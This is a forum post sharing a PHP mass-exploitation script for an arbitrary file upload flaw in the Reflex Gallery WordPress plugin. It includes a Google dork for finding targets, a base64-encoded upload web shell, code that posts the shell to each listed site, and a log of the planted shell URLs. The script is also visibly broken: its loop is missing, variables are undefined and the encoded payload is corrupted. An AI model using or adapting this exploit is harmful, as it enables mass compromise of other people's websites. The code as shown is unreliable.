Jump to content
geeko

Wordpress Plugin Reflex Gallery Arbitrary File Upload Mass Exploiter

By geeko, in Programe utile

Recommended Posts

geeko Newbie

geeko

Posted
Posted 
<?php
/*
* Wordpress Plugin Reflex Gallery Arbitrary File Upload Mass Exploiter
* Google Dork: inurl:wp-content/plugins/reflex-gallery/
* Usage: php exp.php wordpress_site_list.txt
* Exploit Found By CrashBandicot 
*/
$get = file_get_contents($argv[1]);
$list = explode("\r\n",$get);
$uploadfile="upload.php";
$dir ="wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php";

if(!file_exists($uploadfile)) {
    $a1 = base64_decode("PD9waHAKaWYoaXNzZXQoJF9QT1NUWydTdWJtaXQnXSkpewogICAgJGZpbGVkaXIgPSAiIjsgCiAgICAk?bWF4ZmlsZSA9ICcyMDAwMDAwJzsKCiAgICAkdXNlcmZpbGVfbmFtZSA9ICRfRklMRVNbJ2ltYWdlJ11b?J25hbWUnXTsKICAgICR1c2VyZmlsZV90bXAgPSAkX0ZJTEVTWydpbWFnZSddWyd0bXBfbmFtZSddOwog?ICAgaWYgKGlzc2V0KCRfRklMRVNbJ2ltYWdlJ11bJ25hbWUnXSkpIHsKICAgICAgICAkYWJvZCA9ICRm?aWxlZGlyLiR1c2VyZmlsZV9uYW1lOwogICAgICAgIEBtb3ZlX3VwbG9hZGVkX2ZpbGUoJHVzZXJmaWxl?X3RtcCwgJGFib2QpOwogIAplY2hvIjxjZW50ZXI+PGI+RG9uZSA9PT4gJHVzZXJmaWxlX25hbWU8L2I+?PC9jZW50ZXI+IjsKfQp9CmVsc2V7CmVjaG8nCjxmb3JtIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIiIGVu?Y3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiPjxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJpbWFnZSI+?PGlucHV0IHR5cGU9IlN1Ym1pdCIgbmFtZT0iU3VibWl0IiB2YWx1ZT0iU3VibWl0Ij48L2Zvcm0+JzsK?fQo/Pg==");
    @file_get_contents($target.$dir);
    if($file == FALSE) {
        echo "Plugin Not Found\n";
        continue;
    }
    else {
        echo "Found\n[!] Exploiting $target:";
        $tek = $target."/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2015&Month=03";
        $ch = curl_init($tek);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_VERBOSE, false);
    curl_setopt($ch, CURLOPT_POSTFIELDS,array('qqfile'=>"@$uploadfile"));
        curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
        $postResult = curl_exec($ch);
        curl_close($ch);
       // print $postResult;

        if(preg_match("/success/",$postResult)) {
            echo "Success\n[+] Shell Uploaded".$target."/wp-content/uploads/2015/03/$uploadfile";
            $f = fopen("shells.log","a+");
            fwrite($f , "$target"."/wp-content/uploads/2015/03/$uploadfile\n");
            fclose($f);
        }else{
            echo "Failed\n";
        }
        }

    }
?>

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...